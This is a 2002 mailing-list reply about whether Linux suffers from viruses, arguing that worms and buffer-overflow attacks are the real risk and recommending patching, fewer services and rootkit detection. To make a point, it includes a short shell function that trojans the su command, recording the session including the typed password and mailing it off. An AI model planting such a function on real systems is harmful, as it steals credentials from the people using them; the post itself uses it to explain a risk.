[H-GEN] Anti-Virus software for linux

Anthony Towns aj at azure.humbug.org.au
Mon Apr 22 11:55:56 EDT 2002 

On Tue, Apr 23, 2002 at 01:18:44AM +1000, Nikolai Lusan wrote:
> hphillips at 4ward.com.au wrote:
> > I just came across this site ->
> > http://www.avp.ru/products.html?tgroup=4&pgroup=11 amongst the text
> > on that page is 'new viruses _for_ Linux appear every day'.
> > Are there any viruses for linux? If so how many? Surely they don't
> > appear every day!
> By the nature of the permission based sytems that bless the *nix world 
> virii are not like they are in windows world. 

Of course, what you *do* get are lots of automated attacks against
services that might have known buffer overflows...

If you want to spin this, you could say something like "While Linux
systems do not suffer from the email viruses that have plagued Windows
systems recently, they nevertheless can suffer from a number of malicious
attacks launched over the Internet." and go on to explain about "buffer
overflow" attacks, and how to manage your risk (by avoiding running
services that you don't need, by keeping up to date with vendor security
updates and using a vendor who does good updates, by setting up monitoring
data, by validating your system regularly in a variety of ways).

Having and an up-front approach to ensuring your software doesn't
do things you (the user) don't intend it to do [0] is a much better
approach to security than having after/during-the-fact checking with a
virus scanner.

If you want something that fits into the same niche as a virus checker
but on Linux, you should probably be looking for some scripts that detect
various sorts of r00tkits.

> > I am writing a basic sales brochure for small business to implement
> > linux solutions and was asked about viruses on linux. Every other
> > site I have been to has virus scanners that check the mail passing
> > through and/or the files stored on the box, no other site has even
> > mentioned viruses FOR linux.
> Given the things being touted as virii these days (worms like code red 
> and nimda[1] and the plethora of outlook based mail worms) alot of 
> people would call what is, in actual fact, a trojan "a virus". 

Well, thanks to the Internet, viruses have been basically competed to
extinction by worms. Not much point infecting a boot sector or a file
and waiting to be transmitted when you can just get out there and do
it yourself.

> This is 
> not true, for a trojan to get onto a *nix system the superuser has to do 
> something bad 

What you say isn't true either, though. Trojans are really easy: all
you need to do is something like,

	su () {
		(echo '#!/bin/sh'; echo /bin/su "$@") >.hax0r1
		chmod 755 .hax0r1
		SHELL=`pwd`/.hax0r1 script -q .hax0r2
		cat .hax0r2 | mail -s MUAHAHAHAHAHA root at localhost
		rm -f .hax0r1 .hax0r2
	}

to trojan su with reasonable effectiveness, eg, depending on your
purposes. I'd personally consider someone trojaning, say, mutt in manner
similar to the above and capturing all the mail I send or read to be a
reasonably severe security violation.

> [4] any finding grammar, spelling or typing errors needs to run this
      ^^^
>     post through a de-robify script ;)

ITYM "anyone". HTH. HAND.

Cheers,
aj

[0] Permissions (programs acting as "aj" can do some things, programs
    acting as "mail" can do others, programs acting as "root" can do
    other things -- capability systems are even better, of course);
    source availability; catering to the expert rather than the novice
    (and thus expecting the user to direct the program, not vice-versa)
    and bunches of other things can be made to fit under that heading,
    and can be much more effective than virus-checking and similar things.
    Of course, it can be nice to have both...

-- 
Anthony Towns <aj at humbug.org.au> <http://azure.humbug.org.au/~aj/>
I don't speak for anyone save myself. GPG signed mail preferred.

     ``BAM! Science triumphs again!'' 
                    -- http://www.angryflower.com/vegeta.gif
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 350 bytes
Desc: not available
URL: <http://lists.humbug.org.au/pipermail/general/attachments/20020423/3ddd5167/attachment.sig>

More information about the General mailing list